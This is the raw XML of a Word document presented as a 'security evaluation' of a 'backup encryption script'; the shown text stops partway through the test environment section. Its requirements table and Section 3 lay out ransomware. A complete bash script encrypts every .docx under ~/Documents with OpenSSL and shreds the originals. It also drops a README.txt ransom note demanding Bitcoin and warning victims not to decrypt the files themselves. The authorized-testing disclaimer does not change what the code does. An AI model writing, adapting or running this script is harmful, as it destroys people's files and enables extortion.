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283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Security Evaluation Task: Backup Encryption Script Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Document Reference:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> SEC-EVAL-{PLACEHOLDER_DATE}-{PLACEHOLDER_INITIALS}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Classification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Internal Use Only – Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Prepared by:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_NAME}, Security Analyst</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_DATE}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This document outlines the specifications and test parameters for a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>backup encryption script</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> designed to evaluate the security posture of document handling procedures within the organization. The script under assessment utilizes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>AES-256-CBC</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> encryption to protect sensitive Word documents (.docx files) located in the user's Documents folder. The purpose of this evaluation is to verify the script's encryption integrity, file handling behavior, and the appropriateness of its user notification mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:start="240" w:end="240" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t>IMPORTANT NOTE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> This script is intended for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t>authorized security testing only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">. Unauthorized use of encryption tools to restrict access to data may violate organizational policies and applicable laws. All testing must be conducted in isolated, sandboxed environments with explicit approval from the IT Security Director. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Script Functional Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following table details the core functional requirements for the backup encryption script to be evaluated:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11339" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2808"/>
        <w:gridCol w:w="3893"/>
        <w:gridCol w:w="2311"/>
        <w:gridCol w:w="2327"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2E75B6" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Requirement ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3893" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2E75B6" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2E75B6" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2E75B6" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>REQ-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3893" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Recursively scan the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> folder and identify all files with the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>.docx</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> extension.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>REQ-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3893" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Encrypt each identified .docx file using </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>OpenSSL</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>AES-256-CBC</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> cipher mode. Use a securely generated 256-bit key derived from a passphrase.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>REQ-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3893" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">After successful encryption, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>permanently delete</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> the original unencrypted .docx files using a secure deletion method (e.g., </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>shred</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>wipe</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>REQ-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3893" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Generate a ransom note file named </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>README.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> in the root of the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> folder. The note must demand payment for decryption services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>REQ-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3893" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Log all actions (file processed, encryption success/failure, deletion) to a secure audit log file located at </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/var/log/encrypt_script.log</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2808" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>REQ-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3893" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Include error handling for missing dependencies (e.g., OpenSSL not installed) and permission issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2311" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2327" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Proposed Bash Script (Test Version)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following bash script represents the test implementation to be evaluated. All placeholders must be replaced with actual values during deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="160" w:after="160"/>
        <w:ind w:start="160" w:end="160" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:sz w:val="19"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="D0D0D0"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:sz w:val="19"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="D0D0D0"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash # Backup Encryption Script - TEST VERSION # SEC-EVAL-{PLACEHOLDER_DATE} # Author: {PLACEHOLDER_NAME} # Configuration DOCUMENTS_DIR="$HOME/Documents" PASSPHRASE="{PLACEHOLDER_ENCRYPTION_PASSPHRASE}" LOG_FILE="/var/log/encrypt_script.log" RANSOM_NOTE="README.txt" RANSOM_AMOUNT="{PLACEHOLDER_RANSOM_AMOUNT}" RANSOM_WALLET="{PLACEHOLDER_BITCOIN_WALLET}" # Check for OpenSSL if ! command -v openssl &amp;&gt; /dev/null; then echo "ERROR: OpenSSL is not installed. Aborting." | tee -a "$LOG_FILE" exit 1 fi # Create ransom note cat &gt; "$DOCUMENTS_DIR/$RANSOM_NOTE" &lt;&lt; EOF ============================================ YOUR DOCUMENTS HAVE BEEN ENCRYPTED ============================================ All your .docx files have been encrypted with AES-256-CBC. To recover your files, you must pay $RANSOM_AMOUNT in Bitcoin to wallet: $RANSOM_WALLET After payment, contact {PLACEHOLDER_CONTACT_EMAIL} with your unique ID: {PLACEHOLDER_UNIQUE_ID} DO NOT ATTEMPT TO DECRYPT FILES YOURSELF. YOU WILL LOSE YOUR DATA PERMANENTLY. ============================================ EOF # Recursively encrypt .docx files find "$DOCUMENTS_DIR" -type f -name "*.docx" | while read -r file; do echo "Processing: $file" | tee -a "$LOG_FILE" # Encrypt file openssl enc -aes-256-cbc -salt -in "$file" -out "${file}.enc" -pass pass:"$PASSPHRASE" 2&gt;&gt; "$LOG_FILE" if [ $? -eq 0 ]; then # Securely delete original shred -u -z "$file" 2&gt;&gt; "$LOG_FILE" echo "SUCCESS: Encrypted and deleted $file" | tee -a "$LOG_FILE" else echo "FAILURE: Encryption failed for $file" | tee -a "$LOG_FILE" fi done echo "Script execution completed at $(date)" | tee -a "$LOG_FILE" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Test Environment Specifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The script will be evaluated in the following controlled environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Operating System:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Ubuntu 22.04 LTS (isolated VM) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>OpenSSL Version:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 3.0.2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Test User:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>testuser</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> with standard privileges </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
